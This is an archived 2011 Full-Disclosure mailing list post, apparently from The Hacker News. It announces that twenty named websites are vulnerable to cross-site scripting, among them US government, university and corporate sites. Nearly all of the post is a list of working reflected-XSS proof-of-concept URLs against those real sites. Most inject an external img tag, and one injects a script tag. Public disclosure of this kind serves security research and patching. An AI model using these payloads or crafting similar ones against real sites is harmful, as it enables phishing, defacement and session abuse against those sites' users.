lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CADa+gL73hTTAZN+-pA4BSXLwRkxGYqKNTvrWbceHgZaV0Virng@mail.gmail.com>
Date: Wed, 7 Sep 2011 04:58:21 +0530
From: Mohit Kumar <thehackernews@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: 20 Famous websites vulnerable to Cross Site
	Scripting (XSS) Attack

Most of the biggest and Famous sites are found to be Vulnerable to XSS
attack . Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications which allow code injection
by malicious web users into the web pages viewed by other users. Examples of
such code include HTML code and client-side scripts. An exploited cross-site
scripting vulnerability can be used by attackers to bypass access controls
such as the same origin policy. Recently, vulnerabilities of this kind have
been exploited to craft powerful phishing attacks and browser exploits.
Cross-site scripting was originally referred to as CSS, although this usage
has been largely discontinued.

Hacker with code name "*Invectus*" list some such famous sites with
XSS vulnerability as listed below :
*1.)*
http://video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D

*2.)*
http://www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*3.)*
http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false

*4.) *
http://www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit

*5.) *
http://thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*6.)*
http://www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*7.)*
http://www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*8.)*
http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*9.)*
http://www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*10.)*
http://www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*11.)*
http://www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*12.)*
http://www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu

*13.) *
http://cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*14.)*
http://ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13

*15.)*
http://vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*16.)*
http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6

*17.)*
http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

*18.)*
http://www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=http://www.uidaho.edu/search?xml=1&ticks=634508915004972966

*19.)*
https://vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

*20.)*
http://energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E

Original Post ;  : The Hacker News ~
http://thehackernews.com/2011/09/20-famous-websites-vulnerable-to-cross.html
-- 
*Regards,*
*Owner,*
*The Hacker News <http://www.thehackernews.com/>*
*Truth is the most Powerful weapon against Injustice.*

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ